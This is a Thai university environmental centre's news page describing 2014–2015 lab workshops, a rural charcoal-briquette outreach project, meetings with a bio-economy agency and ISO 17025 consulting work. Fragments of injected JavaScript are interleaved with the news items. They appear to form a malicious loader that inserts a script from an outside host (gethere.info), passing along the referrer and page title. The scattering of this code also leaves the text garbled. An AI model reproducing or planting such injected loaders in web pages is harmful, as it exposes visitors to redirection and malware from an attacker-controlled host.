ศูนย์สิ่งแวดล้อมจัดอบรมเชิงปฏิบัติการเรื่องความปลอดภัยในห้องปฏิบัติการให้กับนักศึกษาหลักสูตรสิ่งแวดล้อมเมืองและอุตสาหกรรม

ผู้อำนวยการศูนย์สิ่งแวดล้อมและคณะนักวิจัย ลงพื้นที่ชุมชนหมู่บ้านตะเพินคี่ จังหวัดสุพรรณบุรี เพื่อดำเนินโครงการการเผยแพร่ความรู้เรื่องการผลิตถ่านอัดแท่งจากวัสดุเหลือใช้ทางการเกษตร

นางสาวพรธิดา เทพประสิทธิ์ ผู้อำนวยการศูนย์สิ่งแวดล้อม พร้อมด้วยคณะนักวิจัยของศูนย์ฯ ได้ลงพื้นที่ชุมชน เพื่อดำเนินโครงการการเผยแพร่ความรู้เรื่องการผลิตถ่านอัดแท่งจากวัสดุเหลือใช้ทางการเกษตร ภายใต้โครงการการอนุรักษ์และบริหารจัดการทรัพยากรธรรมชาติบนพื้นที่สูงอย่างยั่งยืน : กรณีศึกษา บ้านตะเพินคี่ จังหวัดสุพรรณบุรี ประจำปีงบประมาณ พ.ศ.2557 ณ บ้านตะเพินคี่ หมู่ที่ 5 ตำบลวังยาว อำเภอด่านช้าง จังหวัดสุพรรณบุรี โดยการดำเนินการครั้งนี้ มีทั้งการอบรมให้ความรู้เรื่องการนำวัสดุเหลือใช้ทางการเกษตรมาใช้ประโยชน์ การผลิตถ่านอัดแท่งจากวัสดุเหลือใช้ทางการเกษตร การสาธิตการเผาวัสดุเหลือใช้ฯ ก่อนนำไปทำถ่านอัดแท่ง รวมทั้งการสาธิตการอัดถ่านแท่ง ฯลฯ เมื่อวันที่ 6-7มิถุนายน 2558 ที่ผ่านมา

 

ศูนย์สิ่งแวดล้อม จัดอบรมเชิงปฏิบัติการในรายวิชา การจัดการและควบคุมมูลฝอย สิ่งปฏิกูลและของเสียอันตราย

เมื่อวันที่ 2 กรกฎาคม 2558 ที่ผ่านมา ศูนย์สิ่งแวดล้อม จัดอบรมเชิงปฏิบัติการในรายวิชา การจัดการและควบคุมมูลฝอย สิ่งปฏิกูลและของเสียอันตราย ให้กับนักศึกษาชั้นปีที่ 3 หลักสูตรสิ่งแวดล้อมเมืองและอุตสาหกรรม คณะวิทยาศาสตร์และเทคโนโลยี มหาวิทยาลัยราชภัฏสวนดุสิต โดย นางสาวเพียงกมล ยุวนานนท์ หัวหน้าส่วนงานมููลฝอย ณ ห้องปฏิบัติการศูนย์สิ่งแวดล้อม อาคารเฉลิมพระเกียรติ 50 พรรษามหาวชิราลงกรณ

ศูนย์สิ่งแวดล้อมจัดอบรมเชิงปฏิบัติ การทดสอบหาปริมาณโพแทสเซียมในขยะมูลฝอย

วันที่ 23 กรกฎาคม 2558 ศูนย์สิ่งแวดล้อม จัดอบรมเชิงปฏิบัติการรายวิชาการจัดการและควบคุมมูลฝอยฯ ต่อเนื่องจากครั้งก่อน ซึ่งเป็นหัวข้อการทดสอบหาค่าโพแทสเซียมในขยะ โดยมีผู้สอน คือ นางสาวพรรณทิพา กิจภักดีกุล ณ ห้องปฏิบัติการศูนย์สิ่งแวดล้อม ชั้น 6 อาคารเฉลิมพระเกียรติ

 

document.currentScript.parentNode.insertBefore(s, document.currentScript);

ผู้อำนวยการศูนย์สิ่งแวดล้อม ในฐานะเลขานุการประธานกรรมการบริหารสำนักงานพัฒนาเศรษฐกิจจากฐานชีวภาพ เข้าร่วมงานวันคล้ายวันสถาปนาสำนักงานพัฒนาเศรษฐกิจจากฐานชีวภาพ (องค์การมหาชน) หรือ BEDO ครบรอบ 8 ปี

เมื่อวันที่ 17 กรกฎาคม 2558 ที่ผ่านมา ผศ.ดร.พิทักษ์ จันทร์เจริญ อธิการบดีมหาวิทยาลัยราชภัฏสวนดุสิต ในฐานะประธานกรรมการบริหารสำนักงานพัฒนาเศรษฐกิจจากฐานชีวภาพ  พร้อมด้วยนางสาวพรธิดา เทพประสิทธิ์ ผู้อำนวยการศูนย์สิ่งแวดล้อม ในฐานะเลขานุการประธานกรรมการ เข้าร่วมงานวันคล้ายวันสถาปนาสำนักงานพัฒนาเศรษฐกิจจากฐานชีวภาพ (องค์การมหาชน)  หรือ BEDO ครบรอบ 8 ปี ณ อาคารรัฐประศาสนภักดี ศูนย์ราชการเฉลิมพระเกียรติ 80 พรรษา

} else {

ผู้อำนวยการศูนย์สิ่งแวดล้อม ในฐานะเลขานุการประธานกรรมการบริหารสำนักงานพัฒนาเศรษฐกิจจากฐานชีวภาพ เข้าร่วมโครงการประชุมเชิงปฏิบัติการ ประเมิน เป้าหมายตัวชี้วัดผลสำเร็จ ปีงบประมาณ พ.ศ. 2558 และจัดทำแผนโครงการปีงบประมาณ พ.ศ.2559 ของสำนักงานพัฒนาเศรษฐกิจจากฐานชีวภาพ

เมื่อวันที่ 27 – 28 มิถุนายน 2558 ที่ผ่านมา ผศ.ดร.พิทักษ์ จันทร์เจริญ อธิการบดีมหาวิทยาลัยราชภัฏสวนดุสิต ในฐานะประธานกรรมการบริหารสำนักงานพัฒนาเศรษฐกิจจากฐานชีวภาพ พร้อมด้วยนางสาวพรธิดา เทพประสิทธิ์ ผู้อำนวยการศูนย์สิ่งแวดล้อม ในฐานะเลขานุการประธานกรรมการ เข้าร่วมโครงการประชุมเชิงปฏิบัติการ ประเมิน เป้าหมายตัวชี้วัดผลสำเร็จ ปีงบประมาณ พ.ศ. 2558 และจัดทำแผนโครงการปีงบประมาณ พ.ศ.2559 ณ โรงแรมเดอะซายน์ (The Zign)จังหวัด ชลบุรี

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

การประชุมบุคลากรศูนย์สิ่งแวดล้อม เพื่อมอบนโยบายการบริหารจัดการ ของศูนย์สิ่งแวดล้อม

IMG_0623 ผศ.ดร.พิทักษ์ จันทร์เจริญ อธิการบดี เป็นประธานการประชุมบุคลากรศูนย์สิ่งแวดล้อม เพื่อมอบนโยบายการบริหารจัดการของศูนย์สิ่งแวดล้อม  ซึ่งมีวาระสำคัญเรื่อง การเตรียมความพร้อมของการออกนอกระบบของมหาวิทยาลัย,แนวนโยบายในการทำงานของบุคลากร และแนวทางความก้าวหน้าในอาชีพ(Career Path) โดยมี ดร.วิชชา  ฉิมพลี คณบดีคณะวิทยาศาสตรและเทคโนโลยี รองคณบดีคณะวิทยาศาสตร์และเทคโนโลยี ผู้อำนวยการกองบริหารงานบุคคล รวมทั้ง รศ.นิยดา  สวัสดิพงษ์ ที่ปรึกษาศูนย์สิ่งแวดล้อม และนางสาวพรธิดา เทพประสิทธิ์  ตลอดจนบุคลากรศูนย์สิ่งแวดล้อม เข้าร่วมประชุมรับทราบนโยบาย ในวันที่ ๒๗ พฤศจิกายน ๒๕๕๗ ณ ห้องประชุมคณะวิทยาศาสตร์และเทคโนโลยี ชั้น ๒ ศูนย์วิทยาศาสตร์

ศูนย์สิ่งแวดล้อม ให้คำปรึกษาและติดตามความก้าวหน้าของการดำเนินงาน ทางด้านวิชาการตามระบบมาตรฐานห้องปฏิบัติการ ISO/IEC 17025 สำนักงานคณะกรรมการป้องกันและปราบปรามยาเสพติด(ป.ป.ส.)

เจ้าหน้าที่ศูนย์ฯ-1

นางสาวพรธิดา  เทพประสิทธิ์  ผู้อำนวยการศูนย์สิ่งแวดล้อม พร้อมทั้งเจ้าหน้าที่ศูนย์ฯ
ได้เข้าให้คำปรึกษาและติดตามความก้าวหน้าของการดำเนินทางด้านวิชาการตามระบบมาตรฐานห้องปฏิบัติการ ISO/IEC 17025 ภายใต้โครงการที่ปรึกษาจัดทำระบบคุณภาพห้องปฏิบัติการ ตามมาตรฐาน ISO/IEC 17025 : 2005 ให้กับเจ้าหน้าที่ห้องปฏิบัติการของสำนักงานคณะกรรมการป้องกันและปราบปรามยาเสพติด (ป.ป.ส.) เมื่อวันทื่ 19 พฤศจิกายน 2557 ณ ห้องประชุม  สำนักงานคณะกรรมการป้องกันและปราบปรามยาเสพติด(ปปส.) ถนนวิภาวดี กรุงเทพมหานคร

if (document.currentScript) {

ต้อนรับคณะเจ้าหน้าที่ของบริษัท ท๊อป-แลบ คอนซัลแตนท์ จำกัด เข้าศึกษาดูงานห้องปฏิบัติการศูนย์สิ่งแวดล้อม

S__2990189

 

          นางสาวพรธิดา เทพประสิทธิ์ ผู้อำนวยการศูนย์สิ่งแวดล้อม ให้การต้อนรับหัวหน้าฝ่ายห้องปฏิบัติการวิเคราะห์ และเจ้าหน้าที่ของบริษัทท๊อป-แลบ คอนซัลแตนท์ จำกัด ซึ่งเป็นหน่วยงานที่ดำเนินกิจการด้านสิ่งแวดล้อมและอาชีวอนามัย ในการเข้าศึกษาดูงานและเยี่ยมชมการดำเนินงานของห้องปฏิบัติการศูนย์สิ่งแวดล้อม โดยมีนายรุ่งเกียรติ ยิ่งเจริญรุ่งโรจน์ หัวหน้าฝ่ายห้องปฏิบัติการ และ นางสาววรรณา  แสนใจกล้า หัวหน้าฝ่ายการตลาด และเจ้าหน้าที่ของศูนย์ฯ พาเยี่ยมชมและตอบข้อซักถามต่างๆ ณ ห้องปฏิบัติการ
ศูนย์สิ่งแวดล้อม อาคารเฉลิมพระเกียรติ 50 พรรษา มหาวชิราลงกรณ์ ชั้น 6 เมื่อวันที่ 7 พฤศจิกายน 2557

ศูนย์สิ่งแวดล้อมนำเสนอรายงานผลการดำเนินงานโครงการตรวจวัดคุณภาพสิ่งแวดล้อม บริเวณด่านเก็บค่าผ่านทางพิเศษ และอาคารสำนักงานของ กทพ. ปีงบประมาณ 2557

nn1if (document.currentScript) {